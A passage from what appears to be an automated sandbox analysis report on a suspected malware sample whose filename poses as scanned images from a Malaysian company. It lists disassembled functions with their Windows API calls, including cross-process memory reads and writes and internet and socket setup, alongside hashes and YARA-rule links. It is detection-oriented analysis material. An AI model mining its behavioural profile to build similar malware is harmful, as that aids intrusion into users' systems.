                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00A79787
                                                          • Part of subcall function 00A81997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A797A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00A819C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @U=u
                                                        • API String ID: 1045663743-2594219639
                                                        • Opcode ID: 78737175f84c8b6c7e873195d6a980e91b486f70f186f756bd5f4c35fcd16af7
                                                        • Instruction ID: d15989b456e63deb185a2b127d54330df00fb324373d0831e21cb1aee93c105a
                                                        • Opcode Fuzzy Hash: 78737175f84c8b6c7e873195d6a980e91b486f70f186f756bd5f4c35fcd16af7
                                                        • Instruction Fuzzy Hash: C3213E32901129ABEF15EFA4CD41FDABBB8FF09350F1041A6F548E7190DA705A45DBA0
                                                        Function 00AA6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AA69D0
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AA69DB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: cc46ba2d61ea53f0785e04ac6892fc929cc2ac7a47be10ae9975748e9971bb23
                                                        • Instruction ID: 7595aa0414afa4b4eaafb9fbe6c55267f2abcb9366d561844f251add38ea2430
                                                        • Opcode Fuzzy Hash: cc46ba2d61ea53f0785e04ac6892fc929cc2ac7a47be10ae9975748e9971bb23
                                                        • Instruction Fuzzy Hash: 0711B271600209AFEF159F54CC80EFB376EEB9A3A4F190129F9589B2D0D7719C518BA0
                                                        Function 00AA9962 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @U=u
                                                        • API String ID: 0-2594219639
                                                        • Opcode ID: 3f69d08afd2e9ce1d4f1aed39448f55b4dff7747544129f5cf91fd27ece8466d
                                                        • Instruction ID: ace1b24fcdd4a934baac50490fbf789e0d9cbc7b2e68ef27552a75a7919c0acf
                                                        • Opcode Fuzzy Hash: 3f69d08afd2e9ce1d4f1aed39448f55b4dff7747544129f5cf91fd27ece8466d
                                                        • Instruction Fuzzy Hash: 92216D35204258BFEB15DF588C45FBB37A4EB0A390F14415AFA16EB1E1D770D9129B60
                                                        Function 00AA6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A21D73
                                                          • Part of subcall function 00A21D35: GetStockObject.GDI32(00000011), ref: 00A21D87
                                                          • Part of subcall function 00A21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A21D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 00AA6EE0
                                                        • GetSysColor.USER32(00000012), ref: 00AA6EFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 7d17ea6c0741ae8b89b49c34569259802ed3c752b5cba9df179903ec6812eac9
                                                        • Instruction ID: a14a84c37db7db7626de664c6160c8c56232ff9aad459f0f6f02173cfa094897
                                                        • Opcode Fuzzy Hash: 7d17ea6c0741ae8b89b49c34569259802ed3c752b5cba9df179903ec6812eac9
                                                        • Instruction Fuzzy Hash: 7321597261020AAFDB04DFA8DD45AEA7BB8FB09314F044629FA55D3290D734E8619B60
                                                        Function 00A82E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82F11
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A82F30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 840ebdd4ac7cfd067a6c8a9c4179a040b7deee5fdb4a08b54fa78258ce122bf5
                                                        • Instruction ID: 4b9e502182165255e12db3d1899e3d3055318375b70949c288662d46e09c6834
                                                        • Opcode Fuzzy Hash: 840ebdd4ac7cfd067a6c8a9c4179a040b7deee5fdb4a08b54fa78258ce122bf5
                                                        • Instruction Fuzzy Hash: 0B11EF32D01214ABDB20FB98DC44BB977B9FB11350F0880B6EA44AB2A0D7B0AE15C795
                                                        Function 00A924CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A92520
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A92549
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 5ef8f9a9496e715eb18f871a1f1614511ab97acf69ca1097e86e6180a5c0988a
                                                        • Instruction ID: d46b828c5fcfa143120c578fb8ac0595bc3fb6f0c98032e06e5a7cfe30cad28f
                                                        • Opcode Fuzzy Hash: 5ef8f9a9496e715eb18f871a1f1614511ab97acf69ca1097e86e6180a5c0988a
                                                        • Instruction Fuzzy Hash: ED11A070641225BEDF248F618C99FFBFFA8FB16751F10812AF90586140D374A981DBE0
                                                        Function 00AA8752 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,?,?,?), ref: 00AA879F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 136f35db256c8edd759b2007808975b84eff219d080f5b6d4381dbd616ece9f8
                                                        • Instruction ID: 9e00503af5be3e83c558e86dc250c53dcce9665b4c5abc6b1e61fc536cc7e2ee
                                                        • Opcode Fuzzy Hash: 136f35db256c8edd759b2007808975b84eff219d080f5b6d4381dbd616ece9f8
                                                        • Instruction Fuzzy Hash: 1221F67960010AEF8B15DF98D880CEA7BB5FB4D340B144159FD05A73A0DB35ED61DBA0
                                                        Function 00AA6825 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00AA689B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u$button
                                                        • API String ID: 3850602802-1762282863
                                                        • Opcode ID: 9f6c067c71149d4b56ef535c54eabfc17a45c71fc0578c2004696157ad49510b
                                                        • Instruction ID: 8fcac1c5f0bb725457e1743954c7417f4c765f8b427f2d06d6f8855613af56e7
                                                        • Opcode Fuzzy Hash: 9f6c067c71149d4b56ef535c54eabfc17a45c71fc0578c2004696157ad49510b
                                                        • Instruction Fuzzy Hash: DE11E132150205ABDF019FA0CC41FEA376EFF1D314F190518FA50A71D0C73AE8919B60
                                                        Function 00AA7AFB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00AA7B47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: eeafcb1186a76bfaeaa9ee71ac06d84d4bdfee5f3fa0f2bc50fecd6b9e6569fb
                                                        • Instruction ID: 732e0f0f4fbc8fb88686b5d6269d345aac30d6ecb7b2a9542256c452fa90f73d
                                                        • Opcode Fuzzy Hash: eeafcb1186a76bfaeaa9ee71ac06d84d4bdfee5f3fa0f2bc50fecd6b9e6569fb
                                                        • Instruction Fuzzy Hash: B011D070504344AFDB20DF74C891AEBBBE9BF06310F10891DE9AB572D1DB7169419B60
                                                        Function 00A980A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A9830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00A980C8,?,00000000,?,?), ref: 00A98322
                                                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A980CB
                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00A98108
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 2496851823-2422070025
                                                        • Opcode ID: 6b5dfa24c013008b540fb8a0b5063c5deafc3e3b685a1735af3b0d26bac8d635
                                                        • Instruction ID: aa55111a3b7fcead40255ab2b004014a813b1b108f375a7bd035e799972f8a86
                                                        • Opcode Fuzzy Hash: 6b5dfa24c013008b540fb8a0b5063c5deafc3e3b685a1735af3b0d26bac8d635
                                                        • Instruction Fuzzy Hash: EA11E534600215ABCF20EFA4CC86FBEB374FF05320F208527E915972D1DB31A811C651
                                                        Function 00A79989 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A819CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A79778,?,?,00000034,00000800,?,00000034), ref: 00A819F6
                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00A799EB
                                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00A79A10
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MemoryProcessWrite
                                                        • String ID: @U=u
                                                        • API String ID: 1195347164-2594219639
                                                        • Opcode ID: 2d64a9fc8ab04e6fd331394bb04e24dd8d8170be59247c2eca7cb62569717f25
                                                        • Instruction ID: 236d9a597bdd59f8a5725106f14f743831cb46d5aa246d70594c73323e7c9a15
                                                        • Opcode Fuzzy Hash: 2d64a9fc8ab04e6fd331394bb04e24dd8d8170be59247c2eca7cb62569717f25
                                                        • Instruction Fuzzy Hash: E3010832900118ABEB20ABA4DC46EEABB7CDB04320F00816AF915A71D0DB705D55CBA0
                                                        Function 00A79AB7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00A79ADD
                                                        • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00A79B10
                                                          • Part of subcall function 00A81997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A797A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00A819C1
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MemoryProcessRead_memmove
                                                        • String ID: @U=u
                                                        • API String ID: 339422723-2594219639
                                                        • Opcode ID: a0a2d9363c577e4564b70b44486533e0221b089d3d5dd62afe10fe417d2ff1c4
                                                        • Instruction ID: 51c0946f7c0a460ca7db08d284454257537f01ca18c7def2f062f73a884c14e2
                                                        • Opcode Fuzzy Hash: a0a2d9363c577e4564b70b44486533e0221b089d3d5dd62afe10fe417d2ff1c4
                                                        • Instruction Fuzzy Hash: 86015B71801128AFDB54EEA4DD81EEA77BCEB14340F40C0A6F689A6150DF314E9ACF90
                                                        Function 00AAC86D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,00A5BB8A,?,?,?), ref: 00AAC8E1
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00AAC8C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageProcSend
                                                        • String ID: @U=u
                                                        • API String ID: 982171247-2594219639
                                                        • Opcode ID: 86d633fd2c571b941eb59dc35cfb880d0bf7f125e53f7519e98ae49ff6fa966e
                                                        • Instruction ID: 4f178929b2b0f747955d57b54b8f4479ee5c99ce1ffd2b35a36e78c51c5bacc9
                                                        • Opcode Fuzzy Hash: 86d633fd2c571b941eb59dc35cfb880d0bf7f125e53f7519e98ae49ff6fa966e
                                                        • Instruction Fuzzy Hash: C501B131200214EBDB219F54DC84F6A3BA6FB9A364F144468F9510B2E0CB76A802EB91
                                                        Function 00A79A1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A79A2E
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A79A46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 9a2343fb251bfb38ec352e0b24b693869d3f7e5cabc6c42843411382b577944b
                                                        • Instruction ID: 7f9cffd0ceae78286d78c5842aef1789a5121a28706eadedb7c7d75f59805638
                                                        • Opcode Fuzzy Hash: 9a2343fb251bfb38ec352e0b24b693869d3f7e5cabc6c42843411382b577944b
                                                        • Instruction Fuzzy Hash: ACE09B353433517AF63056554D4EFD75F5DDB89BA1F158036BB05991E1CBD14C4382E0
                                                        Function 00A7A1A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A7A1BA
                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00A7A1EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 193286dea18f9817269544334c9918b36503aaff7ac2fa1f02135c6b124f643f
                                                        • Instruction ID: f6c23f46bf30e943bf6282d246e4af87d2090ad1e0076c68db73a46ed85a9ed7
                                                        • Opcode Fuzzy Hash: 193286dea18f9817269544334c9918b36503aaff7ac2fa1f02135c6b124f643f
                                                        • Instruction Fuzzy Hash: 46F08235240304BFFA156B949C46FEA3B19EB19751F008424F7055A0E1D6A25C405790
                                                        Function 00A7A327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A79E2E: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00A79E47
                                                          • Part of subcall function 00A79E2E: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A79E81
                                                        • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 00A7A34B
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A7A35B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 9beff3e6f58235128241479dbbe6614b111f9d315f54ed89a1826f57af1eefdd
